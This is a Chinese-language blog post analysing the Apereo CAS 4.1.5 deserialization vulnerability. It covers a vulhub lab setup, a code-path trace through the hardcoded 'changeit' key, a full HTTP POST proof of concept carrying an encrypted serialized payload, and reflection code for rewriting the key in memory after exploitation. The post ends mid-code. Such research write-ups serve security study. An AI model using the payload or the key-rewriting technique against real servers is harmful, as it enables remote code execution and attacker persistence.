<!DOCTYPE html>
<html lang="zn-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="简要cas反序列化是历史漏洞，通过存在的默认keychangeit解码触发反序列化漏洞 环境搭建利用的是vulhub的环境，下载后修改docker-compose.yml文件，添加一个debug后的debug后的端口10080 1234567version: &amp;#x27;2&amp;#x27;services: web:   image: vulhub&#x2F;apereo-cas:4.1.5   ports:">
<meta property="og:type" content="article">
<meta property="og:title" content="cas反序列化漏洞">
<meta property="og:url" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Zad&#39;s blog">
<meta property="og:description" content="简要cas反序列化是历史漏洞，通过存在的默认keychangeit解码触发反序列化漏洞 环境搭建利用的是vulhub的环境，下载后修改docker-compose.yml文件，添加一个debug后的debug后的端口10080 1234567version: &amp;#x27;2&amp;#x27;services: web:   image: vulhub&#x2F;apereo-cas:4.1.5   ports:">
<meta property="og:locale" content="zn_CN">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114165938-81bpg7c.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114170305-ngq15oc.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114154233-uo27pyg.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114171306-5b3w8pw.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114154630-360tmud.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114172320-qvz5bq7.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114173914-hz10j6d.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114172159-2e3nvyb.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114185856-mjo18xx.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114184256-p0lld21.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114184228-0no6cd2.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114185856-mjo18xx.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154405-zs8r2zw.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154421-jk23auv.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154552-aafzip3.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154814-ppj6ko8.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115142504-bhxufgb.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115152935-7my1mhx.png">
<meta property="og:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115155846-30wye1p.png">
<meta property="article:published_time" content="2022-03-09T09:52:12.000Z">
<meta property="article:modified_time" content="2024-03-09T09:58:25.800Z">
<meta property="article:author" content="zad">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114165938-81bpg7c.png">

<link rel="canonical" href="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zn-CN'
  };
</script>

  <title>cas反序列化漏洞 | Zad's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Zad's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zn-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpeg">
      <meta itemprop="name" content="zad">
      <meta itemprop="description" content="不忘初心,方得始终">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Zad's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          cas反序列化漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-03-09 17:52:12" itemprop="dateCreated datePublished" datetime="2022-03-09T17:52:12+08:00">2022-03-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2024-03-09 17:58:25" itemprop="dateModified" datetime="2024-03-09T17:58:25+08:00">2024-03-09</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="简要"><a href="#简要" class="headerlink" title="简要"></a>简要</h2><p>cas反序列化是历史漏洞，通过存在的默认keychangeit解码触发反序列化漏洞</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>利用的是vulhub的环境，下载后修改docker-compose.yml文件，添加一个debug后的debug后的端口10080</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">version: <span class="string">&#x27;2&#x27;</span></span><br><span class="line">services:</span><br><span class="line"> web:</span><br><span class="line">   image: vulhub/apereo-cas:<span class="number">4.1</span><span class="number">.5</span></span><br><span class="line">   ports:</span><br><span class="line">    - <span class="string">&quot;8080:8080&quot;</span></span><br><span class="line">    - <span class="string">&quot;10080:10080&quot;</span></span><br></pre></td></tr></table></figure>

<p>启动容器后，进入容器内部修改catalina.sh，设置为debug模式</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CATALINA_OPTS=<span class="string">&quot;-Xdebug -Xrunjdwp:transport=dt_socket,address=10080,server=y,suspend=n&quot;</span></span><br></pre></td></tr></table></figure>

<p>然后退出容器，重启容器，即可远程dbeug</p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>由于是历史漏洞，那么我们就可以把整个流程倒过来，先复现漏洞，然后再去分析cas系统如何处理请求。</p>
<p>由于个人习惯我喜欢在DispatcherServlet#doDispatch方法上的ha.handle代码处打断点，当前的ha对象为SelectiveFlowHandlerAdapter，我们可以handle方法</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114165938-81bpg7c.png" alt="image"></p>
<p>来到的是FlowHandlerAdapter类，通过查看继承关系，发现SelectiveFlowHandlerAdapter类是FlowHandlerAdapter的子类，所以这里来处理请求的是FlowHandlerAdapter类，接着会通过getFlowExecutionKey方法去获取获取execution参数(该参数就是前端传入payload的地方)，</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114170305-ngq15oc.png" alt="image"></p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114154233-uo27pyg.png" alt="image"></p>
<p>接着通过调用resumeExecution方法，主要是对传入的payload值进行解析</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114171306-5b3w8pw.png" alt="image"></p>
<p>跟如parseFlowExecutionKey方法，会调用pase方法来解析execution参数，以_分割成数组tokens，token[0]为uuid，token[1]的值为base64字节码，最后将uuid赋值给ClientFlowExecutionKey类中的UUID id, byte[] data</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114154630-360tmud.png" alt="image"></p>
<p>返回到resumeExecution方法中，又会调用getFlowExecution方法对我们token[1]，也就是_后的base64字节码进行解密</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114172320-qvz5bq7.png" alt="image"></p>
<p>在getFlowExecution方法中，会判断当前key是否继承ClientFlowExecutionKey，通过getdata方法获取data的值 也就是我们tokens[1]的值，接着对获取到的值进行decode解密操作，跟入</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114173914-hz10j6d.png" alt="image"></p>
<p>在解密过程中调用的加密方式为AES_CBC_PKCS7，秘钥为changeit ，该秘钥也是造成该漏洞的主要条件之一类似shiro一样硬编码在jar包中，后续直接就readObject触发反序列化漏洞。</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114172159-2e3nvyb.png" alt="image"></p>
<p>整个漏洞利用链是比较简单的，那么我们来分析如何去触发这个漏洞，cas是怎么去解析请求的，首先看web.xml，我们看看加载那些配置文件，有一个基础的servlet映射，cas对应的处理类交给了spring dispatcherservlet加载了&#x2F;WEB-INF&#x2F;cas-servlet.xml配置文件</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;context-param&gt;</span><br><span class="line">    &lt;param-name&gt;contextConfigLocation&lt;/param-name&gt;</span><br><span class="line">    &lt;param-value&gt;</span><br><span class="line">        /WEB-INF/spring-configuration<span class="comment">/*.xml</span></span><br><span class="line"><span class="comment">        /WEB-INF/deployerConfigContext.xml</span></span><br><span class="line"><span class="comment">        &lt;!-- this enables extensions and addons to contribute to overall CAS&#x27; application context</span></span><br><span class="line"><span class="comment">             by loading spring context files from classpath i.e. found in classpath jars, etc. --&gt;</span></span><br><span class="line"><span class="comment">        classpath*:/META-INF/spring/*.xml</span></span><br><span class="line"><span class="comment">    &lt;/param-value&gt;</span></span><br><span class="line"><span class="comment">&lt;/context-param&gt;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">&lt;servlet&gt;</span></span><br><span class="line"><span class="comment">    &lt;servlet-name&gt;cas&lt;/servlet-name&gt;</span></span><br><span class="line"><span class="comment">    &lt;servlet-class&gt;</span></span><br><span class="line"><span class="comment">        org.springframework.web.servlet.DispatcherServlet</span></span><br><span class="line"><span class="comment">    &lt;/servlet-class&gt;</span></span><br><span class="line"><span class="comment">    &lt;init-param&gt;</span></span><br><span class="line"><span class="comment">        &lt;param-name&gt;contextConfigLocation&lt;/param-name&gt;</span></span><br><span class="line"><span class="comment">        &lt;param-value&gt;/WEB-INF/cas-servlet.xml, /WEB-INF/cas-servlet-*.xml&lt;/param-value&gt;</span></span><br><span class="line"><span class="comment">    &lt;/init-param&gt;</span></span><br><span class="line"><span class="comment">    &lt;init-param&gt;</span></span><br><span class="line"><span class="comment">        &lt;param-name&gt;publishContext&lt;/param-name&gt;</span></span><br><span class="line"><span class="comment">        &lt;param-value&gt;false&lt;/param-value&gt;</span></span><br><span class="line"><span class="comment">    &lt;/init-param&gt;</span></span><br><span class="line"><span class="comment">    &lt;load-on-startup&gt;1&lt;/load-on-startup&gt;</span></span><br><span class="line"><span class="comment">&lt;/servlet&gt;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">&lt;servlet-mapping&gt;</span></span><br><span class="line"><span class="comment">    &lt;servlet-name&gt;cas&lt;/servlet-name&gt;</span></span><br><span class="line"><span class="comment">    &lt;url-pattern&gt;/login&lt;/url-pattern&gt;</span></span><br><span class="line"><span class="comment">&lt;/servlet-mapping&gt;</span></span><br></pre></td></tr></table></figure>

<p>在cas-servlet中定义了不同的请求对应不同的Executor、Repository等方法去处理</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114185856-mjo18xx.png" alt="image"></p>
<h3 id="为什么login可以触发logout却无法触发"><a href="#为什么login可以触发logout却无法触发" class="headerlink" title="为什么login可以触发logout却无法触发"></a>为什么login可以触发logout却无法触发</h3><p>主要来看我们拿到的flowExecutor的区别，该类的作用就是获取不同的Executor去调用对应的Repository去解析payload，而只有当Repository等于ClientFlowExecutionRepository解析的时候才会触发存在反序列化漏洞</p>
<p>这个是logout</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114184256-p0lld21.png" alt="image"></p>
<p>login的时候</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114184228-0no6cd2.png" alt="image"></p>
<p>那cas是怎么判断去拿对应的Executor的呢，定义在xml文档中</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221114185856-mjo18xx.png" alt="image"></p>
<h2 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /cas/login;jsessionid=879B7DBB8DC93BBFD9898264228306BC HTTP/<span class="number">1.1</span></span><br><span class="line">Host: <span class="number">172.16</span><span class="number">.132</span><span class="number">.192</span>:<span class="number">8080</span></span><br><span class="line">User-Agent: Mozilla/<span class="number">5.0</span> (Windows NT <span class="number">6.2</span>; Win64; x64; rv:<span class="number">106.0</span>) Gecko/<span class="number">20100101</span> Firefox/<span class="number">106.0</span></span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=<span class="number">0.9</span>,image/avif,image/webp,*<span class="comment">/*;q=0.8</span></span><br><span class="line"><span class="comment">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span></span><br><span class="line"><span class="comment">Accept-Encoding: gzip, deflate</span></span><br><span class="line"><span class="comment">Content-Type: application/x-www-form-urlencoded</span></span><br><span class="line"><span class="comment">Content-Length: 1250</span></span><br><span class="line"><span class="comment">Origin: http://172.16.132.192:8080</span></span><br><span class="line"><span class="comment">Connection: close</span></span><br><span class="line"><span class="comment">Referer: http://172.16.132.192:8080/cas/login</span></span><br><span class="line"><span class="comment">Cookie: JSESSIONID=879B7DBB8DC93BBFD9898264228306BC</span></span><br><span class="line"><span class="comment">Upgrade-Insecure-Requests: 1</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">username=admin&amp;password=123456&amp;lt=LT-4-lkMwKHquamVTHCH7Lbb3WnVrMdsZPx-cas01.example.org&amp;execution=744c8069-b862-4866-895f-5fa285f683ea_AAAAIgAAABDV%2BDns5EoKdlW9xIwP6glaAAAABmFlczEyOKWIQQgzRiGCxj%2FhN3jn2kaRsbU9gumxfADt1ZenTe22%2BiWMBzdzQatn%2FZOTt7Yh4j7SRftNWDJEODyHxpR%2B9fwR9CG1a94uDzK5jTdcsq9C7SEsgJzGtA5LG4v5wOlC4D57mW16%2B8K0bMsPdzIBMZYut2WWJGkBNkG2Ne2Q6EX%2F%2FQp5KFhXP3dPvVHsgD0Rqx1NnrwNAuV8HRE8LBT84Z38MpAKMwW7OOqLM6xtqQ5OUZ5HNZRImL3QrqfYH5MXgEYMifMzI%2F%2BKKvdnnC8wXOdEN%2F2cnqqJ4AHJKP51NgxOvuYbjme6JolkqFaiqeGwL17glUsPlparLvvd8EVSbLVQNkRzINQlYxrhZ%2BJXdVhbWRotIkWAFqdJ1nBCyBdKGbZWEdxcnMtxWAD6pIodMxNRBhyugeIUDtv4TtMACU6TMkK80Z6jx0kZOB32rmjyC1XfXWudmHwqHyIklVD1%2FUOxWqlF%2BX0hGxWoZXWolOSbxYEJ%2Fxt951WavKHbThyqP023UIRGX2V1WjuRbBRjgu8wuJ9BerLPaV9mZEYVPKqqduc9aCtyP8qByv8tUkySxBx6zHZvA%2FDPZSWKjpdYDfotJTgYaqoouUKgprhqTfLv%2FALeHkjOrzDqHi7%2BYvr%2FVXwSh%2B6fR9RHea6Txy6r%2FA9UAeJjkfK7spoZrdy1osTKPolCQbuMvVzIDG6idGpapl2AvyLP6mMg88ktZsQRpKH4ab8P803FiZT8l%2FklfRSmpASvkBVhe2XuacCsUl7CK2k1soUrFWG50gcYyQOx6ToTSfR%2BbclZuKpk%2BEhziiknOjmbv44EFjQtLZLBMcQUs5egdrX76eWgPY00a%2BSdOG3NVSym%2FQ2IK6Bg114jSLDPld1DrvMA3OIL%2BmVeFnQLAUF%2FkH1Vt8i441n7oJXDQdJ4ltwrYkIWk3biHl77Ma2lrrohPqOUpsRUeLPullg5OQoKXT5yoZUl6jVj86PtXPY%3D&amp;_eventId=submit&amp;submit=LOGIN</span></span><br></pre></td></tr></table></figure>





<h2 id="cas反序列化拓展攻击-修改key"><a href="#cas反序列化拓展攻击-修改key" class="headerlink" title="cas反序列化拓展攻击-修改key"></a>cas反序列化拓展攻击-修改key</h2><p>在日常攻防演习中不仅我们要防守裁判也要防守友商进入内网，我们知道该漏洞关键的漏洞点就是需要知道编码的key(类似于shiro)，那么在我们已有的反序列化漏洞前提下是否可以修改key，拒绝漏洞进一步利用呢，答案是可行的</p>
<p>设置秘钥有2种方式，第一种就是默认硬编码在key里，第二种就是写在配置文件中，两个方法都是通过BufferedBlockcipherBean对象去设置key</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154405-zs8r2zw.png" alt="image"></p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154421-jk23auv.png" alt="image"></p>
<p>发现其中的setKeyPassword方法是在bufferedBlockCipherBean类的父类的父类AbstractCipherBean对象中，那么思路就很清晰通过内存对象搜索哪里可以拿到AbstractCipherBean对象，调用setKeyPassword方法即可。</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154552-aafzip3.png" alt="image"></p>
<p>但是搜索了整个漏洞触发时候的调用栈没找到可以拿到AbstractCipherBean对象，于是查看类的继承结构发现有两个子类AbstractBlockCipherBean和BufferedBlockCipherBean</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115154814-ppj6ko8.png" alt="image"></p>
<p>分别进行内存对象搜索可以成功拿到BufferedBlockCipherBean对象，整个调用栈如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">TargetObject = &#123;org.apache.tomcat.util.threads.TaskThread&#125; </span><br><span class="line">  ---&gt; threadLocals = &#123;java.lang.ThreadLocal$ThreadLocalMap&#125; </span><br><span class="line">   ---&gt; table = &#123;class [Ljava.lang.ThreadLocal$ThreadLocalMap$Entry;&#125; </span><br><span class="line">    ---&gt; [<span class="number">22</span>] = &#123;java.lang.ThreadLocal$ThreadLocalMap$Entry&#125; </span><br><span class="line">     ---&gt; value = &#123;org.springframework.webflow.mvc.servlet.MvcExternalContext&#125; </span><br><span class="line">      ---&gt; requestMap = &#123;org.springframework.webflow.core.collection.LocalAttributeMap&#125; </span><br><span class="line">       ---&gt; attributes = &#123;java.util.Map&lt;java.lang.String, V&gt;&#125; </span><br><span class="line">        ---&gt; [org.springframework.web.servlet.DispatcherServlet.CONTEXT] = &#123;org.springframework.web.context.support.XmlWebApplicationContext&#125; </span><br><span class="line">          ---&gt; beanFactory = &#123;org.springframework.beans.factory.support.DefaultListableBeanFactory&#125; </span><br><span class="line">                     ---&gt; singletonObjects = &#123;java.util.Map&lt;java.lang.String, java.lang.Object&gt;&#125; </span><br><span class="line">                      ---&gt; [loginFlowCipherBean] = &#123;org.cryptacular.bean.BufferedBlockCipherBean&#125;</span><br></pre></td></tr></table></figure>

<p>通过反射拿到了BufferedBlockCipherBean对象，可以看到该对象现在默认的key为changit</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Thread</span> <span class="variable">thread</span> <span class="operator">=</span> Thread.currentThread();</span><br><span class="line"><span class="type">Field</span> <span class="variable">threadLocals</span> <span class="operator">=</span> thread.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;threadLocals&quot;</span>);</span><br><span class="line">threadLocals.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">ThreadLocalMap</span> <span class="operator">=</span> threadLocals.get(thread);</span><br><span class="line"><span class="type">Field</span> <span class="variable">table</span> <span class="operator">=</span> ThreadLocalMap.getClass().getDeclaredField(<span class="string">&quot;table&quot;</span>);</span><br><span class="line">table.setAccessible(<span class="literal">true</span>);</span><br><span class="line">ThreadLocal.ThreadLocalMap.Entry[]  ThreadLocalMap_Entry = (ThreadLocal.ThreadLocalMap.Entry[])table.get(ThreadLocalMap);</span><br><span class="line"><span class="type">Field</span> <span class="variable">value</span> <span class="operator">=</span> ThreadLocalMap_Entry[<span class="number">6</span>].getClass().getDeclaredField(<span class="string">&quot;value&quot;</span>);</span><br><span class="line">value.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">MvcExternalContext</span> <span class="operator">=</span> value.get(ThreadLocalMap_Entry[<span class="number">6</span>]);</span><br><span class="line"><span class="type">Field</span> <span class="variable">requestMap_filed</span> <span class="operator">=</span> MvcExternalContext.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;requestMap&quot;</span>);</span><br><span class="line">requestMap_filed.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">LocalAttributeMap</span> <span class="operator">=</span> requestMap_filed.get(MvcExternalContext);</span><br><span class="line"><span class="type">Field</span> <span class="variable">attributes</span> <span class="operator">=</span> LocalAttributeMap.getClass().getDeclaredField(<span class="string">&quot;attributes&quot;</span>);</span><br><span class="line">attributes.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Map</span> <span class="variable">map</span> <span class="operator">=</span>(Map) attributes.get(LocalAttributeMap);</span><br><span class="line"><span class="type">Object</span> <span class="variable">XmlWebApplicationContext</span> <span class="operator">=</span> map.get(<span class="string">&quot;org.springframework.web.servlet.DispatcherServlet.CONTEXT&quot;</span>);</span><br><span class="line"><span class="type">Field</span> <span class="variable">beanFactory</span> <span class="operator">=</span> 